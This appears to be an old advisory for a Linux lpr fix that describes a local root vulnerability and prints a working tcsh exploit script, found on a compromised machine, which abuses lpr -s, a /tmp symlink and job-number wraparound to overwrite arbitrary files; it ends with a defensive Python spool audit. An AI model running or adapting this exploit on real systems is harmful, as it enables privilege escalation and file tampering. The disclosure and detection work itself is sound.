ALL current versions of lpr on all distributions have a bug that can give a regular user root access very easily.

The file "lpr" in this fix directory has this bug fixed, and should be copied to /usr/bin/lpr (owned by root, group lp, mode 6755). The file "lpr.c" is the patched source file, that should be copied to /usr/src/usr.sbin/lpd-5.12/lpr/lpr.c.

The following is a script demonstrating the hole that was found on a hacked machine.

--------------------------------------------------------------------
#!/bin/tcsh -f
#
# Usage: lcp from-file to-file
#
if ($#argv != 2) then
	echo Usage: lcp from-file to-file
	exit 1
endif

# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$			# lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$			# to where we really want

@ s = 0
while ( $s != 999)			# loop 999 times
	lpr /nofile >&/dev/null		# spin the job number till it wraps!
	@ s++
	if ( $s % 10 == 0 ) echo -n .
end

lpr $1					# write source file over old data file
					# user becomes owner
rm -f /tmp/.tmp.$$
exit 0
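As an added defensive check, not part of the original advisory or of the lpd sources: the script above only works because `lpr -s` leaves a spool data file that is a symbolic link under the user's control, so a spool that holds anything other than regular files is worth flagging. The Python below audits a spool directory for symlinked data files and reports where they resolve; the spool path, the `dfA…` file names and the sample files are constructed assumptions for the demonstration.

```python
"""Audit an lpd-style spool directory for data files that are symlinks.

A healthy spool holds only regular files owned by the print system.
Any symlink, in particular one whose fully resolved target lies
outside the spool, is the footprint the -s trick leaves behind.
"""
import tempfile
from pathlib import Path


def audit_spool(spool_dir):
    """Return [(name, resolved_target, escapes_spool), ...] for every
    symlink found directly in spool_dir. escapes_spool is True when the
    resolved target is not inside spool_dir."""
    spool = Path(spool_dir).resolve()
    findings = []
    for entry in sorted(spool.iterdir()):
        if not entry.is_symlink():
            continue
        # resolve() follows the whole chain, so a re-pointed intermediate
        # link (the /tmp file in the script above) is seen through
        target = entry.resolve(strict=False)
        escapes = spool not in target.parents and target != spool
        findings.append((entry.name, str(target), escapes))
    return findings


def build_demo_spool():
    """Construct a throw-away spool (constructed sample data, not a real
    lpd spool) mimicking the chain: dfA001 -> tmp link -> target file."""
    root = Path(tempfile.mkdtemp())
    spool = root / "spool"
    spool.mkdir()
    (spool / "dfA000").write_text("honest job\n")   # regular data file
    target = root / "protected_file_stand_in"       # stands in for $2
    target.write_text("root:x:0:0\n")
    tmp_link = root / "tmp_link"                    # stands in for /tmp/.tmp.$$
    tmp_link.symlink_to(target)                     # the re-pointed link
    (spool / "dfA001").symlink_to(tmp_link)         # what `lpr -s` left behind
    return str(spool)


if __name__ == "__main__":
    for name, where, escapes in audit_spool(build_demo_spool()):
        flag = "OUTSIDE SPOOL" if escapes else ""
        print(f"{name} -> {where} {flag}")
```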